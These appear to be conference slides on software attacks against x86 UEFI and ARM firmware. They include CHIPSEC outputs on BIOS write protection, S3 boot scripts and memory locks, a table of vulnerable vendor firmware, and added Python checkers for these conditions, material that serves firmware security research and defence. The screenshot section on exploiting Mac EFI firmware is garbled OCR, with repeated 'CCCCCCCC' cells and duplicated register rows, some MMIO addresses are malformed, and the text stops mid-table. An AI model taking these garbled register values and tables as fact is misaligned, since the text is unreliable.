#### Software attacks on different type of system firmware: arm vs x86

Oleksandr Bazhaniuk (@ABazhaniuk), Yuriy Bulygin (@c7zero)

#### Agenda

- Introduction to x86 and arm architecture
- Reverse engineering firmware and hypervisor
- Attack vectors against firmware and hypervisor
- Exploiting Hypervisor
- Conclusions

#### Where is x86 system firmware?



Source: Symbolic execution for BIOS security

## X86 UEFI [Compliant] Firmware

Figure: x86 UEFI boot flow, starting at CPU Reset.



### **ARMv8 Privileges Levels**



## **ARMv8 Paging**




#### **ARM TrustZone Arch Evolution**



### **Qualcomm Snapdragon 810 boot flow stages**



#### **x86 vs ARM Architecture**

|                | **x86** | **ARM** |
|----------------|---------|---------|
| Root of Trust  | Recently introduced Boot Guard (starting with the Haswell generation) to provide a CPU-based root of trust (Safeguarding rootkits: Intel BootGuard) | ARM has ROM for the root of trust that checks the boot sequence components. May have an OEM unlock mode |
| TEE            | Virtualization-based trusted execution environments. SGX provides enclave execution to user-mode components. SMM is also used as a TEE (can be virtualized with STM) | Flexible Secure World architecture with the capability to run trusted apps. Allows privilege level separation in the Secure World context (EL0, EL1, EL3) |
| Virtualization | VMX technology as context switching between VMX root and VMX guest modes. Supports privilege level separation in VMX root | ARM has hyp mode as an exception level |

## **X86 Hardware Configuration**

#### CPU

1. x86 state: GPR (RAX, ...), Control Registers (CRx), Debug Registers (DRx), etc.
2. CPU Model Specific Registers (MSRs)

#### **CPU and Chipset (SoC)**

1. Processor I/O space: I/O ports and I/O BARs
2. PCIe device configuration space
3. Memory-mapped PCIe configuration access, a.k.a. Enhanced Configuration Access Mechanism (ECAM)
4. Memory-mapped I/O ranges
5. IOSF Message Bus registers

#### X86 Memory Mapped I/O Registers

- Devices may have more registers than the I/O and PCIe configuration spaces can hold, so the BIOS reserves physical address ranges for them
- The ranges are defined by Base Address Registers (BARs); MMIO registers are addressed as offsets from the base of an MMIO range
- Any access to such an MMIO range is forwarded to the device that owns the range (either inside the CPU or over a system bus to the chipset) rather than decoded to DRAM
- The `mmio` command in CHIPSEC lists predefined MMIO BARs, dumps an entire BAR, and reads/writes MMIO registers

| MMIO Range | BAR          | Base             | Size     | En? | Description                        |
|------------|--------------|------------------|----------|-----|------------------------------------|
| GTTMMADR   | 00:02.0 + 10 | 00000000F000000  | 00001000 | 1   | Graphics Translation Table Range   |
| SPIBAR     | 00:1F.0 + F0 | 0000000FED1F800  | 0000200  | 1   | SPI Controller Register Range      |
| HDABAR     | 00:03.0 + 10 | 0000007FFFFFF000 | 00001000 | 1   | HD Audio Controller Register Range |
| GMADR      | 00:02.0 + 18 | 00000000E0000000 | 00001000 | 1   | Graphics Memory Range              |
| DMIBAR     | 00:00.0 + 68 | 00000000FED18000 | 00001000 | 1   | Root Complex Register Range        |
| MMCFG      | 00:00.0 + 60 | 00000000FED1C000 | 00001000 | 1   | PCI Express Register Range         |
| RCBA       | 00:1F.0 + F0 | 0000000FED1C000  | 00004000 | 1   | PCH Root Complex Register Range    |
| MCHBAR     | 00:00.0 + 48 | 0000000FED10000  | 00008000 | 1   | Host Memory Mapped Register Range  |

```
# chipsec_util.py mmio list
# chipsec_util.py mmio read|write|dump <BAR_name> <off> <width> [value]
# chipsec_util.py mmio read SPIBAR 0x78 4
[CHIPSEC] Read SPIBAR + 0x78: 0x8FFF0F40
```
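To make the BAR-to-register resolution above concrete, here is an added example (our own code, not part of the slides or of CHIPSEC) that decodes a raw PCIe BAR DWORD, computes the physical address of a register offset inside the range the way `mmio read SPIBAR 0x78 4` does, and answers the question from the bullets: which MMIO range, if any, decodes a given physical address. The range table is constructed from the `mmio list` slide and the nesting of SPIBAR inside RCBA is taken from those bases and sizes.

```python
"""Resolve an MMIO register address from a PCIe BAR and find which MMIO range
decodes a physical address. Added example; not CHIPSEC code."""

# PCIe Base Address Register encoding (PCI Local Bus Specification):
#   bit 0    : 1 = I/O space BAR, 0 = memory space BAR
#   bits 2:1 : memory BAR type (0b00 = 32-bit, 0b10 = 64-bit)
#   bit 3    : prefetchable
# The remaining high bits hold the base address.
def decode_bar(low, high=None):
    """Decode a raw BAR DWORD (plus the following DWORD for 64-bit BARs).
    Returns (kind, base, prefetchable)."""
    if low & 0x1:
        return ("io", low & ~0x3, False)
    bar_type = (low >> 1) & 0x3
    prefetchable = bool(low & 0x8)
    base = low & ~0xF
    if bar_type == 0x2:
        if high is None:
            raise ValueError("64-bit BAR: upper DWORD required")
        base |= high << 32
    elif bar_type != 0x0:
        raise ValueError("reserved BAR type %#x" % bar_type)
    return ("mem", base, prefetchable)


def mmio_reg_addr(bar_base, offset, bar_size, width=4):
    """Physical address of the register at `offset` inside the range. Refuses
    accesses that would fall past the end of the BAR: such a read hits whatever
    is decoded next, not the device you meant."""
    if offset < 0 or offset + width > bar_size:
        raise ValueError("offset %#x (+%d) outside %#x-byte range"
                         % (offset, width, bar_size))
    return bar_base + offset


# Constructed from the `mmio list` slide: name -> (base, size). SPIBAR lies
# inside RCBA (the PCH root complex space), so ranges can nest.
MMIO_RANGES = {
    "MCHBAR": (0xFED10000, 0x8000),
    "DMIBAR": (0xFED18000, 0x1000),
    "RCBA":   (0xFED1C000, 0x4000),
    "SPIBAR": (0xFED1F800, 0x200),
}


def owner_of(paddr, ranges=MMIO_RANGES):
    """Return (name, offset) of the smallest MMIO range containing `paddr`,
    or None when no range claims it (the access is decoded to DRAM)."""
    hits = [(size, name, paddr - base)
            for name, (base, size) in ranges.items()
            if base <= paddr < base + size]
    if not hits:
        return None
    _, name, off = min(hits)
    return (name, off)


if __name__ == "__main__":
    print(decode_bar(0xF0000004, 0x0))                 # 64-bit memory BAR
    print(hex(mmio_reg_addr(0xFED1F800, 0x78, 0x200)))  # SPIBAR + 0x78
    print(owner_of(0xFED1F878))                         # ('SPIBAR', 0x78)
```

Choosing the smallest enclosing range matters on real platforms: a register reached through SPIBAR is also inside RCBA, and reporting it against the wrong BAR makes the offset meaningless when you go back to the datasheet.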

### **ARM Hardware Configuration**

#### CPU

1. Core state: GPR (R0/X0 .. R15/X15), CPSR, SPSR, etc.
2. Core Configuration Registers (MRC, MRS)

#### CPU and Chipset (SoC)

1. Memory-mapped I/O ranges
2. PCI over MMIO

## Exploring Device MMIO Ranges...

Things we look for in MMIO:

- Registers accessible from different privilege levels
- Registers accessible at Boot vs Run time
- Addresses/pointers in registers

Methods to test MMIO registers:

- Every register in a specific device
- Every page in entire MMIO range
- Non-zero registers



`/proc/iomem` listing from the slide (Qualcomm MSM SoC, as the device names indicate); the tail of the screenshot is not legible and is elided:

```
f9017000-f9017fff : msm-watchdog
f9100000-f9100fff : cci
f920c100-f92fbfff : f9200000.dwc3
f9824900-f9824a9f : mmc0
f991e000-f991efff : msm_serial_hsl
f9924000-f9924fff : f9924000.i2c
f9928000-f9928fff : f9928000.i2c
f9963000-f9963fff : spi_qsd
f9965000-f9965fff : f9965000.i2c
f9966000-f9966fff : spi_qsd
f9967000-f9967fff : f9967000.i2c
f9b38000-f9b387ff : qmp_phy_base
f9b3e000-f9b3e3fe : qmp_ahb2phy_base
fc401680-fc401683 : restart_reg
fc4281d0-fc4291cf : vmpm
fc4a8000-fc4a9fff : tsens_physical
fc4ab000-fc4ab003 : /soc/restart@fc4ab000
fc4bc000-fc4bcfff : tsens_eeprom_physical
fc820000-fc82001f : rmb_base
fc880000-fc8800ff : qdsp6_base
fda00020-fda0002f : csi_clk_mux
fda00030-fda00033 : csiphy_clk_mux
fda00038-fda0003b : csiphy_clk_mux
fda00040-fda00043 : csiphy_clk_mux
fda04000-fda040ff : fda04000.qcom,cpp
fda08000-fda083ff : fda08000.qcom,csid
fda08400-fda087ff : fda08400.qcom,csid
fda08800-fda08bff : fda08800.qcom,csid
fda08c00-fda08cff : fda08c00.qcom,csid
fda0a000-fda0a4ff : fda0a000.qcom,ispif
fda0ac00-fda0adff : fda0ac00.qcom,csiphy
fda0b000-fda0b1ff : fda0b000.qcom,csiphy
fda0b400-fda0b5ff : fda0b400.qcom,csiphy
fda0c000-fda0cfff : fda0c000.qcom,cci
fdb00000-fdb3ffff : kgsl-3d0
...
```
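The three probing methods listed above (every register of one device, every page of a range, only non-zero registers) start from a parsed `/proc/iomem`. The following added example (our own code, not from the slides) parses such a listing, works out registers and pages per region, flags the sub-page regions where page-granular probing would also touch neighbouring registers, and implements the non-zero-register walk against a constructed stand-in for a physical-memory reader. The sample lines are constructed from the screenshot above; the nested child entry and the fake reader values are ours.

```python
"""Turn a /proc/iomem listing into an MMIO probing plan. Added example; the
sample input is constructed from the slide's screenshot."""
import re

PAGE = 0x1000
LINE = re.compile(r"^(\s*)([0-9a-f]+)-([0-9a-f]+)\s*:\s*(.+?)\s*$")

# Constructed sample (the indented child line is ours, to show nesting).
SAMPLE_IOMEM = """\
f9017000-f9017fff : msm-watchdog
f920c100-f92fbfff : f9200000.dwc3
  f920c100-f920c1ff : constructed-child
fc401680-fc401683 : restart_reg
fda00020-fda0002f : csi_clk_mux
"""


def parse_iomem(text):
    """Parse /proc/iomem lines into dicts; /proc/iomem indents children by
    two spaces per level, which we record as `depth`."""
    regions = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # blank or garbled line
        indent, start, end, name = m.groups()
        regions.append({"name": name, "start": int(start, 16),
                        "end": int(end, 16), "depth": len(indent) // 2})
    return regions


def pages_of(region):
    """All 4 KiB pages overlapping the region (method 2: every page)."""
    first = region["start"] & ~(PAGE - 1)
    last = region["end"] & ~(PAGE - 1)
    return list(range(first, last + 1, PAGE))


def probe_plan(regions, reg_width=4):
    """Per region: register count (method 1), page count (method 2) and a
    flag for regions that do not fill whole pages, where a page-granular
    probe reads beyond the device's own registers."""
    plan = {}
    for r in regions:
        size = r["end"] - r["start"] + 1
        plan[r["name"]] = {
            "registers": size // reg_width,
            "pages": len(pages_of(r)),
            "subpage": size < PAGE or r["start"] % PAGE != 0,
        }
    return plan


def nonzero_registers(region, read32, reg_width=4):
    """Method 3: walk the region with a caller-supplied 32-bit reader and
    keep only registers whose value is non-zero."""
    found = {}
    for addr in range(region["start"], region["end"] + 1, reg_width):
        val = read32(addr)
        if val:
            found[addr] = val
    return found


# Constructed stand-in for a physical-memory reader (e.g. a CHIPSEC mem read).
FAKE_MMIO = {0xfc401680: 0x1}


def fake_read32(addr):
    return FAKE_MMIO.get(addr, 0)


if __name__ == "__main__":
    regs = parse_iomem(SAMPLE_IOMEM)
    for name, info in probe_plan(regs).items():
        print(name, info)
    print(nonzero_registers(regs[3], fake_read32))
```

The `subpage` flag is the practical caveat: `restart_reg` is four bytes wide, so "every page in the range" on it means reading 4 KiB that mostly belongs to other blocks, and the result must be attributed back to whichever neighbouring region actually owns each offset.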

## Check known vulnerabilities in x86 UEFI firmware

| Issue                                                           | CHIPSEC Module              | References                                                                                    |
|-----------------------------------------------------------------|-----------------------------|-----------------------------------------------------------------------------------------------|
| SMRAM Locking                                                   | common.smm                  | CanSecWest 2006                                                                               |
| BIOS Keyboard Buffer Sanitization                               | common.bios_kbrd_buffer     | DEFCON 16                                                                                     |
| SMRR Configuration                                              | common.smrr                 | ITL 2009, CanSecWest 2009                                                                     |
| BIOS Protection                                                 | common.bios_wp              | BlackHat USA 2009, CanSecWest 2013, Black Hat 2013, NoSuchCon 2013                            |
| SPI Controller Locking                                          | common.spi_lock             | Flashrom, Copernicus                                                                          |
| BIOS Interface Locking                                          | common.bios_ts              | PoC 2007                                                                                      |
| Secure Boot variables with keys and configuration are protected | common.secureboot.variables | UEFI 2.4 Spec, All Your Boot Are Belong To Us (here & here)                                   |
| Memory remapping attack                                         | remap                       | Preventing and Detecting Xen Hypervisor Subversions                                           |
| DMA attack against SMRAM                                        | smm_dma                     | Programmed I/O accesses: a threat to VMM?, System Management Mode Design and Security Issues  |
| SMI suppression attack                                          | common.bios_smi             | Setup for Failure: Defeating Secure Boot                                                      |
| Access permissions to SPI flash descriptor                      | common.spi_desc             | Flashrom                                                                                      |
| Access permissions to UEFI variables defined in UEFI Spec       | common.uefi.access_uefispec | UEFI 2.4 Spec                                                                                 |
| Module to detect PE/TE Header Confusion Vulnerability           | tools.secureboot.te         | All Your Boot Are Belong To Us                                                                |
| Module to detect SMI input pointer validation vulnerabilities   | tools.smm.smm_ptr           | CanSecWest 2015                                                                               |

#### **Unprotected x86 firmware in flash (Skylake based desktop)**

CHIPSEC `bios_wp` output from the slide (screenshot; the leading fragments of the OS and platform lines are cut off in the source):

```
...tu SMP Thu Jan 15 17:43:14 UTC 2015 x86_64
...ad Core (Skylake CPU / Sunrise Point PCH)
[+] loaded chipsec.modules.common.bios_wp
[*] running loaded modules ..
[*] running module: chipsec.modules.common.bios_wp
[*] Module path: /home/user/Desktop/chipsec/source/tool/chipsec/modules/common/bios_wp.pyc
[x][ Module: BIOS Region Write Protection
  [00] BIOSWE  = 0 << BIOS Write Enable
  [01] BLE     = 0 << BIOS Lock Enable
  [02] SRC     = 2
  [04] TSS     = 0 << Top Swap Status
  [05] SMM_BWP = 0 << SMM BIOS Write Protection
  [06] BBS     = 0
  [07] BILD    = 1 << BIOS Interface Lock Down
[-] BIOS region write protection is disabled!
...on: Base = 0
```

| PRx (offset) | Value    | Base     | Limit    | WP? | RP? |
|--------------|----------|----------|----------|-----|-----|
| PR0 (84)     | 00000000 | 00000000 | 00000000 | 0   | 0   |
| PR1 (88)     | 00000000 | 00000000 | 00000000 | 0   | 0   |
| PR2 (8C)     | 00000000 |          | 00000000 | 0   | 0   |
| PR3 (90)     | 00000000 |          |          | 1   | 0   |
| PR4 (94)     | 00000000 | 00000000 | 00000000 |     | 0   |
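To show what the output above is actually deciding, here is an added example (our own code, not CHIPSEC's) that decodes the BIOS Control (BC) register fields printed by `bios_wp` and the SPI Protected Range (PRx) registers, and returns a verdict. The decision rule is our reading of the check: the region counts as protected when both BLE and SMM_BWP are set, or when a PRx with write protection covers the whole BIOS region. The PRx layout assumed is the PCH one (bit 31 = WP, bit 15 = RP, bits 28:16 = limit and bits 12:0 = base, both in 4 KiB units), and the BIOS region base/limit used in the demo are constructed values.

```python
"""Decide whether the SPI flash BIOS region is write-protected from the BC
and PRx register values. Added example; rule and layouts as described in the
lead-in, not CHIPSEC's implementation."""

# BIOS Control register fields: (name, bit shift, width), matching the
# [bit] labels the bios_wp module prints.
BC_FIELDS = [("BIOSWE", 0, 1), ("BLE", 1, 1), ("SRC", 2, 2), ("TSS", 4, 1),
             ("SMM_BWP", 5, 1), ("BBS", 6, 1), ("BILD", 7, 1)]


def decode_bc(bc):
    return {name: (bc >> shift) & ((1 << width) - 1)
            for name, shift, width in BC_FIELDS}


def decode_pr(pr):
    """Assumed PCH PRx layout: WP bit 31, RP bit 15, limit 28:16, base 12:0."""
    return {
        "wp": (pr >> 31) & 1,
        "rp": (pr >> 15) & 1,
        "base": (pr & 0x1FFF) << 12,
        "limit": (((pr >> 16) & 0x1FFF) << 12) | 0xFFF,
    }


def bios_write_protected(bc, prs, bios_base, bios_limit):
    """Return (protected, reason). BLE on its own is not accepted: the lock
    is only counted when SMM_BWP is set as well."""
    f = decode_bc(bc)
    if f["BLE"] and f["SMM_BWP"]:
        return True, "BC: BLE=1 SMM_BWP=1 (writes restricted to SMM)"
    for i, pr in enumerate(prs):
        d = decode_pr(pr)
        if d["wp"] and d["base"] <= bios_base and d["limit"] >= bios_limit:
            return True, "PR%d covers BIOS region" % i
    return False, "no lock bits set and no PRx covers the BIOS region"


# Constructed from the slide: BLE=0, SRC=2, SMM_BWP=0, BILD=1 -> BC = 0x88,
# and every PRx is zero.
BC_SLIDE = 0x88
PRS_SLIDE = [0, 0, 0, 0, 0]
# Constructed BIOS region for the demo (not from the slide).
BIOS_BASE, BIOS_LIMIT = 0x500000, 0x7FFFFF


def pr_for(base, limit, wp=True):
    """Build a PRx value covering base..limit (4 KiB granular)."""
    return ((1 << 31) if wp else 0) | ((limit >> 12) << 16) | (base >> 12)


if __name__ == "__main__":
    print(decode_bc(BC_SLIDE))
    print(bios_write_protected(BC_SLIDE, PRS_SLIDE, BIOS_BASE, BIOS_LIMIT))
    fixed = [pr_for(BIOS_BASE, BIOS_LIMIT)] + [0] * 4
    print(bios_write_protected(BC_SLIDE, fixed, BIOS_BASE, BIOS_LIMIT))
```

A PRx that covers only part of the region is deliberately not accepted: the unprotected remainder is exactly what the module is there to find, so the check requires base and limit to enclose the whole region.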

# **Vulnerable Systems**

| Manufacturer | Vulnerable firmware images | Vulnerable models                                         |
|--------------|----------------------------|-----------------------------------------------------------|
| Acer         | 0 - 2                      | 0 - 2                                                     |
| ASRock       | 73                         | ~53 models (all older than Skylake)                       |
| ASUS         | 629                        | ~61 models (all older than Ivy Bridge)                    |
| Dell         | 51                         | ~11 models (Vostro and Inspiron older than 2014)          |
| Gigabyte     | 1117 (345 Skylake+)        | ~247 models including Skylake (6 Gen Intel Core) or newer |
| HP           | 11                         | ~6                                                        |
| Intel        | 0                          | 0                                                         |
| Lenovo       | 75                         | ~26 (ThinkServer TS150-550, ThinkCentre/IdeaCentre)       |
| MSI          | 1461 (495 Skylake+)        | ~98 models including Skylake (6 Gen Intel Core) or newer  |
| Total        | 3417 (16.1%)               | ~502 models                                               |

Source: Discovering Vulnerable UEFI Firmware at Scale

#### S3 Boot Script Vulnerabilities in Mac EFI and x86 UEFI

```
[*] running module: chipsec.modules.common.uefi.s3bootscript
[x][ Module: S3 Resume Boot-Script Protections
...
[!] Found 1 S3 boot-script(s) in EFI variables
[*] Checking S3 boot-script at 0x000000DA88A018
[!] S3 boot-script is in unprotected memory (not in SMRAM)
[*] Reading S3 boot-script from memory..
[*] Decoding S3 boot-script opcodes..
[*] Checking entry-points of Dispatch opcodes..
[-] Found Dispatch opcode (at 0x4A15) with entry-point 0x0000000DA5C3260: UNPROTECTED
[-] Entry-points of Dispatch opcodes in S3 boot-script are not in protected memory
[-] FAILED: S3 Boot Script and entry-points of Dispatch opcodes do not appear to be protected
```
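The module output above reports two distinct conditions: the boot script itself sitting outside protected memory, and Dispatch opcodes whose entry-points point outside protected memory. The added example below (our own code, not the CHIPSEC module) walks a boot-script table and reports both. The record layout it parses (u16 opcode, u8 record length, operands; Dispatch opcode 8 carrying a u64 entry-point; 0xFF as terminator) is an assumption modelled on the EDK2 S3BootScriptLib format, not a parser for any particular firmware's table; the SMRAM range is constructed, while the script and entry-point addresses are the ones shown in the output.

```python
"""Audit an S3 resume boot script: is the script in protected memory, and do
all Dispatch entry-points lie in protected memory? Added example; record
layout is an assumption (see lead-in)."""
import struct

OP_IO_WRITE = 0x00    # assumed opcode number, used only for a filler record
OP_DISPATCH = 0x08    # assumed opcode number
OP_TERMINATE = 0xFF   # assumed terminator opcode


def dispatch_record(entry_point):
    return struct.pack("<HBQ", OP_DISPATCH, 3 + 8, entry_point)


def filler_record(opcode, payload):
    return struct.pack("<HB", opcode, 3 + len(payload)) + payload


def terminate_record():
    return struct.pack("<HB", OP_TERMINATE, 3)


def iter_records(script):
    """Yield (offset, opcode, operand bytes). Stops at the terminator and
    rejects a bad length, so a corrupted table cannot make the walk loop or
    read past the buffer."""
    off = 0
    while off + 3 <= len(script):
        opcode, length = struct.unpack_from("<HB", script, off)
        if length < 3 or off + length > len(script):
            raise ValueError("malformed record at offset %#x" % off)
        yield off, opcode, script[off + 3:off + length]
        if opcode == OP_TERMINATE:
            return
        off += length


def in_protected(addr, protected):
    return any(lo <= addr <= hi for lo, hi in protected)


def audit_boot_script(script_addr, script, protected):
    """Return a list of (what, address) findings; empty means both checks
    from the module output pass."""
    findings = []
    if not in_protected(script_addr, protected):
        findings.append(("script", script_addr))
    for off, opcode, operands in iter_records(script):
        if opcode == OP_DISPATCH:
            (entry,) = struct.unpack("<Q", operands)
            if not in_protected(entry, protected):
                findings.append(("dispatch@%#x" % off, entry))
    return findings


# Constructed SMRAM (TSEG) range for the demo.
SMRAM = [(0x7F000000, 0x7FFFFFFF)]
# Addresses from the slide's output; the table contents are constructed.
SCRIPT_ADDR = 0xDA88A018
SCRIPT = (filler_record(OP_IO_WRITE, b"\x00" * 8)
          + dispatch_record(0xDA5C3260)   # outside SMRAM: flagged
          + dispatch_record(0x7F100000)   # inside SMRAM: not flagged
          + terminate_record())


if __name__ == "__main__":
    for what, addr in audit_boot_script(SCRIPT_ADDR, SCRIPT, SMRAM):
        print("UNPROTECTED %s: %#x" % (what, addr))
```

The walk treats a record whose length field is shorter than its header, or runs past the end of the buffer, as an error rather than skipping it; on a table that an OS-level writer can modify, a length check is what keeps the auditor itself from being steered.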

#### **Exploiting Mac x86 EFI firmware**

Attack: modifying PRx registers in the unprotected S3 resume boot script

Terminal from the slide (screenshot, cut off at the end of the page):

```
liveuser@localhost:/home/liveuser/Desktop/chipsec/source/tool
[CHIPSEC] VID: 8086
[CHIPSEC] DID: 0404
[+] loaded chipsec.modules.common.bios_wp
[*] running loaded modules ..
[*] running module: chipsec.modules.common.bios_wp
[*] Module path: /home/liveuser/Desktop/chipsec/tool/chipsec/modules/common/bios_wp.pyc
[*] ====================================
```
                                                       |                           |
| <pre>[x][ ===================================</pre>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                       |                           |
| <pre>[*] BC = 0x18 &lt;&lt; EIOS Control (b:d.f 00:31.0 + 0xDC)<br/>[00] BIOSWE = 0 &lt;&lt; BIOS Write Enable<br/>[01] BLE = 0 &lt;&lt; BIOS Lock Enable<br/>[02] SRC = 2 &lt;&lt; SPI Read Configuration<br/>[04] TSS = 1 &lt;&lt; Top Swap Status<br/>[05] SMM_EWP = 0 &lt;&lt; SMM BIOS Write Protection<br/>[-] BIOS region write protection is disabled!</pre>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          
                                                       |                           |
| <pre>[+] BIOS Region: Base = 0x00190000, Limit = 0x007FFFF SPI Protected Ranges PRx (offset)   Value   Base   Limit   WP?   RP? PR0 (74)   00000000   00000000   0   0 PR1 (78)   00000000   00000000   0 PR1 (78)   00000000   00000000   0 PR1 (78)   00000000   000000000   0 PR1 (78)   00000000   00000000   0 PR1 (78)   00000000   00000000000   0 PR1 (78)   00000000   000000000000   0 PR1 (78)   00000000   00000000000   0 PR1 (78)   00000000   0 PR1 (78)   00000000   0 PR1 (78)   0 PR</pre> |                           |
| R2 (7C)         CCCCCCCC         CCCCCCCC         CCCCCCCC         CCCCCCCC         CCCCCCCC         CCCCCCCC         CCCCCCCC         CCCCCCCC         CCCCCCCC         CCCCCCCCC         CCCCCCCCCC         CCCCCCCCCCC         CCCCCCCCCCC         CCCCCCCCCCCC         CCCCCCCCCCCCCCCC         CCCCCCCCCCCCCCC         CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               |                           |
| <pre>!] None of the SPI protected ranges write-protect BIOS region !] BIOS should enable all available SMM based write protection mechanisms or configure SPI protected ranges to protect the entire .] FAILED: BIOS is NOT protected completely HIPSEC] ************************************</pre>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                       | e BIOS region             |
| IIPSEC) Modules skipped 0:<br>(IPSEC) ++++++++++++++++++++++++++++++++++++                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    
                                                       |                           |
| 🚌 🔎 🐂 Iveüser@localho                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         
                                                       | 1 <b>-</b> 4              |

#### X86 memory configuration

chipsec\_main -m memconfig

```
[*] running module: chipsec.modules.memconfig
[x][ =======================================================================
[x][ Module: Host Bridge Memory Map Locks
[x][ =======================================================================
[*] PCI0.0.0_BDSM
[*] PCI0.0.0_BGSM       = 0x000000008B800001 - LOCKED - Base of GTT Stolen Memory
[*] PCI0.0.0_DPR        = 0x000000008B400001 - LOCKED - DMA Protected Range
[*] PCI0.0.0_GGC        = 0x00000000000002C1 - LOCKED - Graphics Control
[*] PCI0.0.0_MESEG_MASK = 0x0000007FFF000C00 - LOCKED - Manageability Engine Limit Address Register
[*] PCI0.0.0_PAVPC      = 0x000000008FF00047 - LOCKED - PAVP Configuration
[*] PCI0.0.0_REMAPBASE  = 0x00000007FF000001 - LOCKED - Memory Remap Base Address
[*] PCI0.0.0_REMAPLIMIT = 0x000000086EF00001 - LOCKED - Memory Remap Limit Address
[*] PCI0.0.0_TOLUD      = 0x0000000000000000001 - LOCKED - Top of Low Usable DRAM
[*] PCI0.0.0_TOM        = 0x00000080000001 - LOCKED - Top of Memory
[*] PCI0.0.0_TOUUD      = 0x000000086F000001 - LOCKED - Top of Upper Usable DRAM
[*] PCI0.0.0_TSEGMB     = 0x000000008B400001 - LOCKED - TSEG Memory Base
[+] PASSED: All memory map registers seem to be locked down
```

Checking LOCK bits in PCIe config registers
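The two CHIPSEC checks above make a decision from register bits: bios_wp from the BIOS Control register and the SPI protected ranges, memconfig from the lock bit of each host-bridge memory-map register. The following added example (not CHIPSEC's own code, and it never touches hardware) re-implements that decision logic on register values you pass in, so the verdict can be reproduced from a dump or a log. The PRx field layout is the PCH one (4 KiB granularity); the BIOS region limit 0x7FFFFF and the memconfig sample are assumptions.

```python
"""Model of the two CHIPSEC checks shown above: BIOS region write protection
(common.bios_wp) and host-bridge memory-map lock bits (memconfig).
Added example; it re-implements the decision logic on register values you
supply. It is not CHIPSEC's own code and does not touch hardware."""

# BIOS Control register (BC, b:d.f 00:31.0 offset 0xDC) bits as labelled in the output above
BC_BIOSWE = 1 << 0    # BIOS Write Enable
BC_BLE = 1 << 1       # BIOS Lock Enable: an SMI fires when BIOSWE is set, SMM can clear it again
BC_SMM_BWP = 1 << 5   # SMM BIOS Write Protection: flash writes only while all threads are in SMM


def decode_pr(value):
    """Decode one SPI Protected Range register (PR0..PR4, 4 KiB granularity):
    bit 31 = write-protect enable, bit 15 = read-protect enable,
    bits 28:16 = limit (address bits 24:12), bits 12:0 = base (address bits 24:12)."""
    base = (value & 0x1FFF) << 12
    limit = (((value >> 16) & 0x1FFF) << 12) | 0xFFF
    return {"base": base, "limit": limit, "wp": bool(value >> 31 & 1), "rp": bool(value >> 15 & 1)}


def pr_covers_bios(prs, bios_base, bios_limit):
    """True if WP-enabled protected ranges cover the BIOS region without a gap."""
    cursor = bios_base
    for base, limit in sorted((r["base"], r["limit"]) for r in map(decode_pr, prs) if r["wp"]):
        if base > cursor:
            break                      # hole in coverage
        if limit >= cursor:
            cursor = limit + 1
    return cursor > bios_limit


def bios_write_protected(bc, bios_base, bios_limit, prs):
    """Verdict in the spirit of bios_wp: protected only if SMM-based protection is complete
    (BLE=1, BIOSWE=0 and SMM_BWP=1) or the protected ranges cover the whole BIOS region.
    Returns (protected, findings)."""
    findings = []
    smm_wp = bool(bc & BC_BLE) and not (bc & BC_BIOSWE)
    if not smm_wp:
        findings.append("BIOSWE/BLE: BIOS region write protection is disabled")
    elif not (bc & BC_SMM_BWP):
        smm_wp = False
        findings.append("SMM_BWP=0: BLE alone can be raced by a non-SMM thread on multi-core parts")
    spr = pr_covers_bios(prs, bios_base, bios_limit)
    if not spr:
        findings.append("no SPI protected range write-protects the whole BIOS region")
    return smm_wp or spr, findings


def unlocked_memmap_regs(regs):
    """memconfig-style check: each host-bridge memory-map register (TOLUD, TSEGMB, ...)
    carries its lock in bit 0; return the names of those still writable."""
    return [name for name, value in regs.items() if not value & 1]


if __name__ == "__main__":
    # Values taken from the bios_wp output above; the region limit is assumed to be 0x7FFFFF.
    print(bios_write_protected(0x18, 0x190000, 0x7FFFFF, [0] * 5))
    # Hardened configurations: BLE+SMM_BWP, or PR0 write-protecting 0x190000..0x7FFFFF.
    print(bios_write_protected(0x22, 0x190000, 0x7FFFFF, [0] * 5))
    print(bios_write_protected(0x18, 0x190000, 0x7FFFFF, [0x87FF0190, 0, 0, 0, 0]))
    # Constructed memconfig sample: TSEGMB left unlocked.
    print(unlocked_memmap_regs({"PCI0.0.0_TOLUD": 0x8FF00001, "PCI0.0.0_TSEGMB": 0x8B400000}))
```

The BC=0x18 case from the screenshot fails both branches: no SMM-based protection and no protected range, so a kernel-privileged attacker can write the SPI flash directly. Either hardened configuration passes, which is the practical choice a BIOS has: lock writes behind SMM (with SMM_BWP so the lock cannot be raced) or cover the region with PRx.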

#### **ARM Based System Boot Flow**

- Root of trust is in ROM at APSS/RPM
- The read-only ROM verifies the RW firmware it loads
- Uses OTP fuses to program the OEM lock; unlocking the bootloader is an explicit step:
  - # adb reboot bootloader
  - # sudo fastboot oem unlock
- TrustZone components (Secure World) initialize and set up runtime protections before transferring execution to any hypervisor or OS bootloader component

## **Example of ARM SoC Configuration**

#### 0xF9112188 APCS\_COMMON\_CLUST\_LVL\_SEL

Type: RW Clock: SYS\_AHB\_CLK Reset State: 0x00000000

Security Treatment: Controlled by Shared\_secure[CLK]

Select register for the various muxes choosing between the corresponding outputs of cluster 0 or cluster 1

#### APCS\_COMMON\_CLUST\_LVL\_SEL

| Bits | Name         | Description                                                    |
